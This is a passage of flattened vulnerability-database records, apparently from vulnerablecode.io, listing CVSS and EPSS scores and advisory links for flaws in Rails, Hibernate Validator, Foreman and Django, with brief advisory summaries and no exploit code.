url http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00107.html
3
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8164.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8164.json
4
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8164
reference_id
reference_type
scores
0
value 0.07389
scoring_system epss
scoring_elements 0.91732
published_at 2026-04-13T12:55:00Z
1
value 0.07389
scoring_system epss
scoring_elements 0.9169
published_at 2026-04-01T12:55:00Z
2
value 0.07389
scoring_system epss
scoring_elements 0.91698
published_at 2026-04-02T12:55:00Z
3
value 0.07389
scoring_system epss
scoring_elements 0.91703
published_at 2026-04-04T12:55:00Z
4
value 0.07389
scoring_system epss
scoring_elements 0.91712
published_at 2026-04-07T12:55:00Z
5
value 0.07389
scoring_system epss
scoring_elements 0.91724
published_at 2026-04-08T12:55:00Z
6
value 0.07389
scoring_system epss
scoring_elements 0.91731
published_at 2026-04-09T12:55:00Z
7
value 0.07389
scoring_system epss
scoring_elements 0.91734
published_at 2026-04-11T12:55:00Z
8
value 0.07389
scoring_system epss
scoring_elements 0.91736
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8164
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
8
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
9
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
10
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
11
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
12
reference_url https://github.com/rails/rails
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails
13
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8164.yml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8164.yml
14
reference_url https://groups.google.com/forum/#!topic/rubyonrails-security/f6ioe4sdpbY
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/rubyonrails-security/f6ioe4sdpbY
15
reference_url https://groups.google.com/g/rubyonrails-security/c/f6ioe4sdpbY
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/f6ioe4sdpbY
16
reference_url https://hackerone.com/reports/292797
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://hackerone.com/reports/292797
17
reference_url https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html
18
reference_url https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
19
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8164
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8164
20
reference_url https://www.debian.org/security/2020/dsa-4766
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2020/dsa-4766
21
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1842634
reference_id 1842634
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1842634
22
reference_url https://github.com/advisories/GHSA-8727-m6gj-mc37
reference_id GHSA-8727-m6gj-mc37
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8727-m6gj-mc37
23
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2020-8164, GHSA-8727-m6gj-mc37
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-a6sp-18av-wya6
26
url VCID-afkn-k8yk-w3dr
vulnerability_id VCID-afkn-k8yk-w3dr
summary 
Improper Input Validation in Hibernate Validator
A flaw was found in Hibernate Validator version 6.1.2.Final. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10693.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10693.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-10693
reference_id
reference_type
scores
0
value 0.00282
scoring_system epss
scoring_elements 0.5154
published_at 2026-04-09T12:55:00Z
1
value 0.00282
scoring_system epss
scoring_elements 0.51551
published_at 2026-04-13T12:55:00Z
2
value 0.00282
scoring_system epss
scoring_elements 0.51563
published_at 2026-04-12T12:55:00Z
3
value 0.00282
scoring_system epss
scoring_elements 0.51584
published_at 2026-04-11T12:55:00Z
4
value 0.00282
scoring_system epss
scoring_elements 0.5145
published_at 2026-04-01T12:55:00Z
5
value 0.00282
scoring_system epss
scoring_elements 0.51501
published_at 2026-04-02T12:55:00Z
6
value 0.00282
scoring_system epss
scoring_elements 0.51528
published_at 2026-04-04T12:55:00Z
7
value 0.00282
scoring_system epss
scoring_elements 0.51489
published_at 2026-04-07T12:55:00Z
8
value 0.00282
scoring_system epss
scoring_elements 0.51542
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-10693
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10693
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10693
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10693
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10693
4
reference_url https://lists.apache.org/thread.html/rb8dca19a4e52b60dab0ab21e2ff9968d78f4b84e4033824db1dd24b4@%3Cpluto-scm.portals.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb8dca19a4e52b60dab0ab21e2ff9968d78f4b84e4033824db1dd24b4@%3Cpluto-scm.portals.apache.org%3E
5
reference_url https://lists.apache.org/thread.html/rd418deda6f0ebe658c2015f43a14d03acb8b8c2c093c5bf6b880cd7c@%3Cpluto-dev.portals.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd418deda6f0ebe658c2015f43a14d03acb8b8c2c093c5bf6b880cd7c@%3Cpluto-dev.portals.apache.org%3E
6
reference_url https://lists.apache.org/thread.html/rf9c17c3efc4a376a96e9e2777eee6acf0bec28e2200e4b35da62de4a@%3Cpluto-dev.portals.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf9c17c3efc4a376a96e9e2777eee6acf0bec28e2200e4b35da62de4a@%3Cpluto-dev.portals.apache.org%3E
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-10693
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-10693
8
reference_url https://www.ibm.com/support/pages/node/6348216
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.ibm.com/support/pages/node/6348216
9
reference_url https://www.oracle.com/security-alerts/cpuapr2022.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2022.html
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1805501
reference_id 1805501
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1805501
11
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988946
reference_id 988946
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988946
12
reference_url https://github.com/advisories/GHSA-rmrm-75hp-phr2
reference_id GHSA-rmrm-75hp-phr2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rmrm-75hp-phr2
13
reference_url https://access.redhat.com/errata/RHSA-2020:3806
reference_id RHSA-2020:3806
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3806
14
reference_url https://access.redhat.com/errata/RHSA-2020:4252
reference_id RHSA-2020:4252
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4252
15
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
16
reference_url https://access.redhat.com/errata/RHSA-2020:4960
reference_id RHSA-2020:4960
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4960
17
reference_url https://access.redhat.com/errata/RHSA-2020:4961
reference_id RHSA-2020:4961
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4961
fixed_packages
aliases CVE-2020-10693, GHSA-rmrm-75hp-phr2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-afkn-k8yk-w3dr
27
url VCID-am23-ncy4-27ck
vulnerability_id VCID-am23-ncy4-27ck
summary foreman: Stored XSS in fact name or value
references
0
reference_url http://projects.theforeman.org/issues/21519
reference_id
reference_type
scores
url http://projects.theforeman.org/issues/21519
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-15100.json
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-15100.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-15100
reference_id
reference_type
scores
0
value 0.00343
scoring_system epss
scoring_elements 0.56845
published_at 2026-04-01T12:55:00Z
1
value 0.00343
scoring_system epss
scoring_elements 0.56956
published_at 2026-04-13T12:55:00Z
2
value 0.00343
scoring_system epss
scoring_elements 0.57
published_at 2026-04-11T12:55:00Z
3
value 0.00343
scoring_system epss
scoring_elements 0.56979
published_at 2026-04-12T12:55:00Z
4
value 0.00343
scoring_system epss
scoring_elements 0.56941
published_at 2026-04-02T12:55:00Z
5
value 0.00343
scoring_system epss
scoring_elements 0.56962
published_at 2026-04-04T12:55:00Z
6
value 0.00343
scoring_system epss
scoring_elements 0.56938
published_at 2026-04-07T12:55:00Z
7
value 0.00343
scoring_system epss
scoring_elements 0.56989
published_at 2026-04-08T12:55:00Z
8
value 0.00343
scoring_system epss
scoring_elements 0.56992
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-15100
4
reference_url https://github.com/theforeman/foreman/pull/4967
reference_id
reference_type
scores
url https://github.com/theforeman/foreman/pull/4967
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1508551
reference_id 1508551
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1508551
6
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:foreman:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:theforeman:foreman:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:foreman:*:*:*:*:*:*:*:*
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-15100
reference_id CVE-2017-15100
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:N/I:P/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://nvd.nist.gov/vuln/detail/CVE-2017-15100
fixed_packages
aliases CVE-2017-15100
risk_score 2.8
exploitability 0.5
weighted_severity 5.5
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-am23-ncy4-27ck
28
url VCID-bdms-nb18-guf9
vulnerability_id VCID-bdms-nb18-guf9
summary Django 1.10 before 1.10.7, 1.9 before 1.9.13, and 1.8 before 1.8.18 relies on user input in some cases to redirect the user to an "on success" URL. The security check for these redirects (namely ``django.utils.http.is_safe_url()``) considered some numeric URLs "safe" when they shouldn't be, aka an open redirect vulnerability. Also, if a developer relies on ``is_safe_url()`` to provide safe redirect targets and puts such a URL into a link, they could suffer from an XSS attack.
references
0
reference_url https://access.redhat.com/errata/RHSA-2017:1445
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1445
1
reference_url https://access.redhat.com/errata/RHSA-2017:1451
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1451
2
reference_url https://access.redhat.com/errata/RHSA-2017:1462
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1462
3
reference_url https://access.redhat.com/errata/RHSA-2017:1470
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1470
4
reference_url https://access.redhat.com/errata/RHSA-2017:1596
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1596
5
reference_url https://access.redhat.com/errata/RHSA-2017:3093
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3093
6
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
7
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-7233.json
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-7233.json
8
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-7233
reference_id
reference_type
scores
0
value 0.00689
scoring_system epss
scoring_elements 0.71725
published_at 2026-04-04T12:55:00Z
1
value 0.00689
scoring_system epss
scoring_elements 0.71737
published_at 2026-04-08T12:55:00Z
2
value 0.00689
scoring_system epss
scoring_elements 0.71749
published_at 2026-04-09T12:55:00Z
3
value 0.00689
scoring_system epss
scoring_elements 0.71773
published_at 2026-04-11T12:55:00Z
4
value 0.00689
scoring_system epss
scoring_elements 0.71756
published_at 2026-04-12T12:55:00Z
5
value 0.00689
scoring_system epss
scoring_elements 0.71706
published_at 2026-04-02T12:55:00Z
6
value 0.00689
scoring_system epss
scoring_elements 0.71739
published_at 2026-04-13T12:55:00Z
7
value 0.00689
scoring_system epss
scoring_elements 0.71699
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-7233
9
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9013
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9013
10
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9014
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9014
11
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7233
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7233
12
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7234
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7234
13
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:P/I:P/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
14
reference_url https://github.com/advisories/GHSA-37hp-765x-j95x
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-37hp-765x-j95x
15
reference_url https://github.com/django/django
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django
16
reference_url https://github.com/django/django/commit/254326cb3682389f55f886804d2c43f7b9f23e4f
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/254326cb3682389f55f886804d2c43f7b9f23e4f
17
reference_url https://github.com/django/django/commit/8339277518c7d8ec280070a780915304654e3b66
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/8339277518c7d8ec280070a780915304654e3b66
18
reference_url https://github.com/django/django/commit/f824655bc2c50b19d2f202d7640785caabc82787
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/f824655bc2c50b19d2f202d7640785caabc82787
19
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2017-9.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2017-9.yaml
20
reference_url https://www.djangoproject.com/weblog/2017/apr/04/security-releases
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.djangoproject.com/weblog/2017/apr/04/security-releases
21
reference_url https://www.djangoproject.com/weblog/2017/apr/04/security-releases/
reference_id
reference_type
scores
url https://www.djangoproject.com/weblog/2017/apr/04/security-releases/
22
reference_url http://www.debian.org/security/2017/dsa-3835
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.debian.org/security/2017/dsa-3835
23
reference_url http://www.securityfocus.com/bid/97406
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/97406
24
reference_url http://www.securitytracker.com/id/1038177
reference_id
reference_type
scores
url http://www.securitytracker.com/id/1038177
25
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1437234
reference_id 1437234
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1437234
26
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=859515
reference_id 859515
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=859515
27
reference_url https://security.archlinux.org/ASA-201704-2
reference_id ASA-201704-2
reference_type
scores
url https://security.archlinux.org/ASA-201704-2
28
reference_url https://security.archlinux.org/AVG-233
reference_id AVG-233
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-233
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:a1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.0:a1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:a1:*:*:*:*:*:*
31
